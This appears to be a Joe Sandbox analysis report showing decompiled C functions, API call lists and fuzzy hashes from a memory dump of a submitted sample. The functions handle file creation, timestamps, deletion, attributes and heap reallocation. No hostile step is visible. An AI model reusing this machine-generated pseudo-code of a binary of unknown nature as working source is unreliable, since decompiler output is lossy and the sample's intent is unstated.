Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: f4cb242497bd4f6ac1dfb12ff5bc4df4da9153def21ec0d81f3f2f9dd797db0e
Instruction ID: 2a23101a9306d260450a2d50ee02d7a6f7d1dd658d274b0f157a43e7fdfedd34
Opcode Fuzzy Hash: f4cb242497bd4f6ac1dfb12ff5bc4df4da9153def21ec0d81f3f2f9dd797db0e
Instruction Fuzzy Hash: 08310571900209AFDB10EFA8C541B9DB7F5FF40363F214099ED04AB2A2EB769D49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A31E50 Relevance: 3.1, APIs: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00A31E50(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t38;
				intOrPtr _t47;
				void* _t68;
				unsigned int _t70;
				signed int _t72;
				intOrPtr* _t74;
				void* _t76;

				_t68 = __edx;
				E00A4EB78(0xa62673, _t76);
				_t55 = 0;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t76 - 0x24)) = 0;
				 *(_t76 - 0x20) = 0;
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				 *((intOrPtr*)(_t76 - 0x18)) = 0;
				 *((char*)(_t76 - 0x14)) = 0;
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t76 - 4)) = 0;
				_push(_t76 - 0x24);
				_t38 = E00A33BBA(__ecx); // executed
				if(_t38 != 0) {
					_t70 =  *(_t76 - 0x20);
					E00A31732(_t76 - 0x24, _t68, 1);
					_t74 =  *((intOrPtr*)(_t76 + 8));
					 *((char*)( *(_t76 - 0x20) +  *((intOrPtr*)(_t76 - 0x24)) - 1)) = 0;
					_t16 = _t70 + 1; // 0x1
					E00A318A9(_t74, _t16);
					_t47 =  *((intOrPtr*)(_t76 - 0x10));
					if( *((intOrPtr*)(_t47 + 0x6cc8)) != 3) {
						if(( *(_t47 + 0x460c) & 0x00000001) == 0) {
							E00A41B84( *((intOrPtr*)(_t76 - 0x24)),  *_t74,  *((intOrPtr*)(_t74 + 4)));
						} else {
							_t72 = _t70 >> 1;
							E00A41BFD( *((intOrPtr*)(_t76 - 0x24)),  *_t74, _t72);
							 *((short*)( *_t74 + _t72 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t74 + 4)));
						_push( *_t74);
						_push( *((intOrPtr*)(_t76 - 0x24)));
						E00A41C3B();
					}
					E00A318A9(_t74, E00A53E13( *_t74));
					_t55 = 1;
				}
				_t39 =  *((intOrPtr*)(_t76 - 0x24));
				 *((intOrPtr*)(_t76 - 4)) = 2;
				if( *((intOrPtr*)(_t76 - 0x24)) != 0) {
					if( *((char*)(_t76 - 0x14)) != 0) {
						E00A3F445(_t39,  *((intOrPtr*)(_t76 - 0x1c)));
						_t39 =  *((intOrPtr*)(_t76 - 0x24));
					}
					L00A53E2E(_t39);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t55;
			}

0x00a31e50
0x00a31e55
0x00a31e5e
0x00a31e62
0x00a31e65
0x00a31e68
0x00a31e6b
0x00a31e6e
0x00a31e71
0x00a31e74
0x00a31e75
0x00a31e79
0x00a31e7c
0x00a31e7f
0x00a31e86
0x00a31e8e
0x00a31e96
0x00a31ea1
0x00a31ea4
0x00a31ea8
0x00a31eae
0x00a31eb3
0x00a31ebd
0x00a31ed5
0x00a31ef6
0x00a31ed7
0x00a31ed7
0x00a31edf
0x00a31ee8
0x00a31ee8
0x00a31ebf
0x00a31ebf
0x00a31ec2
0x00a31ec4
0x00a31ec7
0x00a31ec7
0x00a31f06
0x00a31f0c
0x00a31f0e
0x00a31f0f
0x00a31f12
0x00a31f1b
0x00a31f21
0x00a31f27
0x00a31f2c
0x00a31f2c
0x00a31f30
0x00a31f35
0x00a31f3c
0x00a31f44

APIs

__EH_prolog.LIBCMT ref: 00A31E55

Part of subcall function 00A33BBA: __EH_prolog.LIBCMT ref: 00A33BBF

_wcslen.LIBCMT ref: 00A31EFD

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 2c41c343362279f71b377911ad00e8ae159e7051de87ae992aa5051a875c373e
Instruction ID: 636ebb6e55fbae258579e5397e067a8a1d1165800d7ec687cba8baf6dbf9ea3d
Opcode Fuzzy Hash: 2c41c343362279f71b377911ad00e8ae159e7051de87ae992aa5051a875c373e
Instruction Fuzzy Hash: 08312876904209AFCF15DF98CA45AEEBBF6BF48300F20446AF845A7251CB365E55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A39DA2 Relevance: 3.1, APIs: 2, Instructions: 83
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A39DA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t35;
				signed char _t50;
				signed int* _t52;
				signed char _t58;
				void* _t59;
				void* _t60;
				signed int* _t61;
				signed int* _t63;

				_t60 = __esi;
				_t59 = __ecx;
				if( *(__ecx + 0x20) != 0x100 && ( *(__ecx + 0x20) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 8));
				}
				_t52 = _a4;
				_t50 = 1;
				if(_t52 == 0 || ( *_t52 | _t52[1]) == 0) {
					_t58 = 0;
					_v25 = 0;
				} else {
					_t58 = 1;
					_v25 = 1;
				}
				_push(_t60);
				_t61 = _a8;
				if(_t61 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t50;
					if(( *_t61 | _t61[1]) == 0) {
						goto L9;
					}
				}
				_t63 = _a12;
				if(_t63 == 0 || ( *_t63 | _a4) == 0) {
					_t50 = 0;
				}
				if(_t58 != 0) {
					E00A4138A(_t52, _t58,  &_v24);
				}
				if(_v26 != 0) {
					E00A4138A(_t61, _t58,  &_v8);
				}
				if(_t50 != 0) {
					E00A4138A(_t63, _t58,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t35 = SetFileTime( *(_t59 + 8),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t50 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t35;
			}

0x00a39da2
0x00a39da8
0x00a39db1
0x00a39dbc
0x00a39dbc
0x00a39dc2
0x00a39dc8
0x00a39dcb
0x00a39ddc
0x00a39dde
0x00a39dd4
0x00a39dd4
0x00a39dd6
0x00a39dd6
0x00a39de2
0x00a39de3
0x00a39de9
0x00a39df6
0x00a39df6
0x00a39deb
0x00a39df0
0x00a39df4
0x00000000
0x00000000
0x00a39df4
0x00a39dfb
0x00a39e01
0x00a39e0b
0x00a39e0b
0x00a39e0f
0x00a39e16
0x00a39e16
0x00a39e20
0x00a39e29
0x00a39e29
0x00a39e31
0x00a39e3a
0x00a39e3a
0x00a39e4a
0x00a39e58
0x00a39e68
0x00a39e70
0x00a39e7c

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A373BC,?,?,?,00000000), ref: 00A39DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00A39E70

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: cf8c402cbdb2790cf6298b9dfdd5bfee9a6e96ed1070e091fce950b750a088fd
Instruction ID: f16c6e0693dd17be447acec9718c0f5ef987d86cbfd5aa3a8b1e815d57e1360d
Opcode Fuzzy Hash: cf8c402cbdb2790cf6298b9dfdd5bfee9a6e96ed1070e091fce950b750a088fd
Instruction Fuzzy Hash: 4221E132248386AFC714DF75C892AABBBE8AF95344F08491DF4C587141D3A9E90DDB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A3966E Relevance: 3.1, APIs: 2, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3966E(void* __ecx, WCHAR* _a4100, signed char _a4104) {
				short _v0;
				signed int _t27;
				void* _t29;
				signed char _t38;
				signed int _t42;
				long _t45;
				void* _t46;
				long _t48;

				E00A4EC50(0x1000);
				_t38 = _a4104;
				_t46 = __ecx;
				_t42 = _t38 >> 1;
				if((_t38 & 0x00000010) != 0) {
					L3:
					_t48 = 1;
					__eflags = 1;
				} else {
					_t52 =  *((char*)(__ecx + 0x30));
					if( *((char*)(__ecx + 0x30)) != 0) {
						goto L3;
					} else {
						_t48 = 0;
					}
				}
				 *(_t46 + 0x20) = _t38;
				_t45 = ((_t42 ^ 0x00000001) << 0x1f) + 0x40000000;
				_t27 =  *(E00A3C27E(_t52, _a4100)) & 0x0000ffff;
				if(_t27 == 0x2e || _t27 == 0x20) {
					if((_t38 & 0x00000020) != 0) {
						goto L8;
					} else {
						_t39 = _a4100;
						_t29 = _t27 | 0xffffffff;
					}
				} else {
					L8:
					_t39 = _a4100;
					__eflags = 0;
					_t29 = CreateFileW(_a4100, _t45, _t48, 0, 2, 0, 0); // executed
				}
				 *(_t46 + 8) = _t29;
				if(_t29 == 0xffffffff && E00A3BB03(_t39,  &_v0, 0x800) != 0) {
					 *(_t46 + 8) = CreateFileW( &_v0, _t45, _t48, 0, 2, 0, 0);
				}
				 *(_t46 + 0x10) =  *(_t46 + 0x10) & 0x00000000;
				 *((char*)(_t46 + 0x1c)) = 1;
				 *((char*)(_t46 + 0x15)) = 0;
				return E00A40602(_t46 + 0x32, _t39, 0x800) & 0xffffff00 |  *(_t46 + 8) != 0xffffffff;
			}

0x00a39673
0x00a39679
0x00a39685
0x00a39687
0x00a3968c
0x00a39698
0x00a3969a
0x00a3969a
0x00a3968e
0x00a3968e
0x00a39692
0x00000000
0x00a39694
0x00a39694
0x00a39694
0x00a39692
0x00a396a9
0x00a396ac
0x00a396b7
0x00a396bd
0x00a396c7
0x00000000
0x00a396c9
0x00a396c9
0x00a396d0
0x00a396d0
0x00a396d5
0x00a396d5
0x00a396d5
0x00a396dc
0x00a396e6
0x00a396e6
0x00a396ec
0x00a396f2
0x00a3971c
0x00a3971c
0x00a3971f
0x00a3972d
0x00a39731
0x00a3974b

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A39F27,?,?,00A3771A), ref: 00A396E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A39F27,?,?,00A3771A), ref: 00A39716

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 52f5daddc81d069a4bdc16a68fb3eebea05c0c1e12d1b6270d78eee5d5021e40
Instruction ID: 41cb077a74a8474713deadb5b539a3fc17669ac4d176b993c6f27d714fa41f2c
Opcode Fuzzy Hash: 52f5daddc81d069a4bdc16a68fb3eebea05c0c1e12d1b6270d78eee5d5021e40
Instruction Fuzzy Hash: D021C1715003446FE3308B65CD8AFA7B7DCEB49320F004A19FA96C21D2C7B8A8858671

Uniqueness

Uniqueness Score: -1.00%

Function 00A39E80 Relevance: 3.1, APIs: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A39E80(void* __ecx) {
				long _v8;
				void* __ebp;
				long _t13;
				long _t15;
				signed int _t17;
				char* _t33;
				void* _t36;
				long _t37;
				void* _t39;

				_push(__ecx);
				_t36 = __ecx;
				_t33 = __ecx + 0x1e;
				if( *((intOrPtr*)(__ecx + 8)) != 0xffffffff) {
					_t21 = __ecx + 0x32;
					goto L4;
				} else {
					if( *_t33 == 0) {
						L12:
						_t17 = _t13 | 0xffffffff;
					} else {
						_t21 = __ecx + 0x32;
						E00A36D5B(0xa71098, _t39, __ecx + 0x32);
						L4:
						if( *((intOrPtr*)(_t36 + 0x10)) != 1) {
							_v8 = _v8 & 0x00000000;
							_t15 = SetFilePointer( *(_t36 + 8), 0,  &_v8, 1); // executed
							_t37 = _t15;
							if(_t37 != 0xffffffff) {
								L10:
								asm("cdq");
								_t17 = 0 + _t37;
								asm("adc edx, 0x0");
							} else {
								_t13 = GetLastError();
								if(_t13 == 0) {
									goto L10;
								} else {
									if( *_t33 == 0) {
										goto L12;
									} else {
										E00A36D5B(0xa71098, _t39, _t21);
										goto L10;
									}
								}
							}
						} else {
							_t17 =  *(_t36 + 0x28);
						}
					}
				}
				return _t17;
			}

0x00a39e83
0x00a39e86
0x00a39e8d
0x00a39e90
0x00a39ea7
0x00000000
0x00a39e92
0x00a39e95
0x00a39f02
0x00a39f02
0x00a39e97
0x00a39e97
0x00a39ea0
0x00a39eaa
0x00a39eae
0x00a39eb8
0x00a39ec7
0x00a39ecd
0x00a39ed2
0x00a39eee
0x00a39ef3
0x00a39ef8
0x00a39efa
0x00a39ed4
0x00a39ed4
0x00a39edc
0x00000000
0x00a39ede
0x00a39ee1
0x00000000
0x00a39ee3
0x00a39ee9
0x00000000
0x00a39ee9
0x00a39ee1
0x00a39edc
0x00a39eb0
0x00a39eb0
0x00a39eb3
0x00a39eae
0x00a39e95
0x00a39f01

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00A39EC7
GetLastError.KERNEL32 ref: 00A39ED4

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 0594ba415e1fc22b0d784238ba20c5058722929a10bcf5be15f9220cd68f999d
Instruction ID: 41253dddb4ff9336d0d1becd0b22d1a1321ae615a8d870241039b14203a3d8fe
Opcode Fuzzy Hash: 0594ba415e1fc22b0d784238ba20c5058722929a10bcf5be15f9220cd68f999d
Instruction Fuzzy Hash: BF118231600700ABD724C768CC45BA7B7F9AB45361F608A29F553D26D0D7F0ED4AC660

Uniqueness

Uniqueness Score: -1.00%

Function 00A58E54 Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A58E54(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0xa926e4, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00A58C34();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00A57A5E(_t10, _t13, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00A591A8())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00A58DCC(_t14);
					goto L6;
				}
				_t9 = E00A58E06(__ecx, _a8); // executed
				return _t9;
			}

0x00a58e54
0x00a58e54
0x00a58e5a
0x00a58e5f
0x00a58e6d
0x00a58e70
0x00a58e72
0x00a58e7d
0x00a58e80
0x00a58ea7
0x00a58eb1
0x00a58eb7
0x00a58eb9
0x00000000
0x00000000
0x00a58e98
0x00a58e9a
0x00000000
0x00000000
0x00a58e9d
0x00a58ea2
0x00a58ea3
0x00a58ea5
0x00000000
0x00000000
0x00a58ea5
0x00a58e8f
0x00000000
0x00a58e8f
0x00a58e82
0x00a58e87
0x00a58e8d
0x00a58e8d
0x00a58e8d
0x00000000
0x00a58e8d
0x00a58e75
0x00000000
0x00a58e7a
0x00a58e64
0x00000000

APIs

_free.LIBCMT ref: 00A58E75

Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A54286,?,0000015D,?,?,?,?,00A55762,000000FF,00000000,?,?), ref: 00A58E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00A71098,00A317CE,?,?,00000007,?,?,?,00A313D6,?,00000000), ref: 00A58EB1

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: fbdd6e6d72b401b565a1b444d1e230a9be75cacf64b32f78d984f7b448ca3fe3
Instruction ID: f97d1692e20270bea844b94e836ed730222c398d37aadc698e1799521d4ed374
Opcode Fuzzy Hash: fbdd6e6d72b401b565a1b444d1e230a9be75cacf64b32f78d984f7b448ca3fe3
Instruction Fuzzy Hash: B0F0F632201115B6DB216B66AD07BAF3778BF91B73F244126FD18BA191DF7CCD0985A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4109E Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4109E(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 != 0) {
					_t14 = 0;
					_t17 = _v8;
					_t15 = 1;
					do {
						if((_t17 & _t15) != 0) {
							_t14 = _t14 + 1;
						}
						_t15 = _t15 + _t15;
					} while (_t15 != 0);
					if(_t14 >= 1) {
						return _t14;
					}
					return 1;
				} else {
					return _t8 + 1;
				}
			}

0x00a410b2
0x00a410ba
0x00a410c1
0x00a410c5
0x00a410c8
0x00a410ca
0x00a410cc
0x00a410ce
0x00a410ce
0x00a410cf
0x00a410cf
0x00a410d6
0x00000000
0x00a410d8
0x00a410db
0x00a410bc
0x00a410be
0x00a410be

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00A410AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00A410B2

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 47fb8fdeeee94225f3cb3a020950e0713dfa466003831badf9b8c08f4630e1d2
Instruction ID: 3fce1b2aadadd9fc557ca335a3ee28ab8bfe95571186ac41e6623e70084a9494
Opcode Fuzzy Hash: 47fb8fdeeee94225f3cb3a020950e0713dfa466003831badf9b8c08f4630e1d2
Instruction Fuzzy Hash: 28E09A7BB00149E78F0D8BA49C058AB72EDEAC42043208179E413E3101FA70EE874AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A3E648 Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3E648(void* __eflags, int _a4, WCHAR* _a8, int _a12) {
				int _t11;
				void* _t14;
				WCHAR* _t15;

				_t15 = _a8;
				 *_t15 = 0;
				if(E00A3D9B0(0xa71030, _t14, __eflags, _a4, _t15, _a12, 0, 0) == 0) {
					_t11 = LoadStringW( *0xa71028, _a4, _t15, _a12); // executed
					if(_t11 == 0) {
						LoadStringW( *0xa7102c, _a4, _t15, _a12);
					}
				}
				return _t15;
			}

0x00a3e64c
0x00a3e65b
0x00a3e669
0x00a3e678
0x00a3e680
0x00a3e68f
0x00a3e68f
0x00a3e680
0x00a3e699

APIs

LoadStringW.USER32(00A313B6,?,00A71098,00A313B6), ref: 00A3E678
LoadStringW.USER32(00A313B6,?,00A71098), ref: 00A3E68F

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: dffa0ae20141b37b3ea03456191ddbfbb13feb74a0141b9b7c050d972974e816
Instruction ID: 4210f54e7945180fba2b1c3b380508a4abb25d72811b6f87bc78e1f5703e8b65
Opcode Fuzzy Hash: dffa0ae20141b37b3ea03456191ddbfbb13feb74a0141b9b7c050d972974e816
Instruction Fuzzy Hash: 23F0FE36100254BBCF115FA5EC04DAB7FA9FF19390B008416FE0885130D73289629BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A4ED Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3A4ED(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t13;
				signed int _t19;
				signed int _t20;

				E00A4EC50(0x1000);
				_t13 = SetFileAttributesW(_a4, _a8); // executed
				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
				if(_t13 == 0 && E00A3BB03(_a4,  &_v4100, 0x800) != 0) {
					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t20;
			}

0x00a3a4f5
0x00a3a501
0x00a3a509
0x00a3a50e
0x00a3a53a
0x00a3a53a
0x00a3a541

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501

Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: d958d2214293a75086016a5370b94a9b3e304d1c6438092de6054ecdbef318ae
Instruction ID: 090f8af23d24787055c503e3b57e0f7d0a07f3ea581ef93ecffa4f92412f2af6
Opcode Fuzzy Hash: d958d2214293a75086016a5370b94a9b3e304d1c6438092de6054ecdbef318ae
Instruction Fuzzy Hash: 2FF0ED32210219BBDF019FA0DC41FDA377CBF14385F488060BA88D61A0DB71CADAEB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A1E0 Relevance: 3.0, APIs: 2, Instructions: 27
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3A1E0(WCHAR* _a4) {
				short _v4100;
				int _t11;
				signed int _t17;
				signed int _t18;

				E00A4EC50(0x1000);
				_t11 = DeleteFileW(_a4); // executed
				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
				if(_t11 == 0 && E00A3BB03(_a4,  &_v4100, 0x800) != 0) {
					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t18;
			}

0x00a3a1e8
0x00a3a1f1
0x00a3a1f9
0x00a3a1fe
0x00a3a227
0x00a3a227
0x00a3a22e

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641,000000FF), ref: 00A3A1F1

Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641), ref: 00A3A21F

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

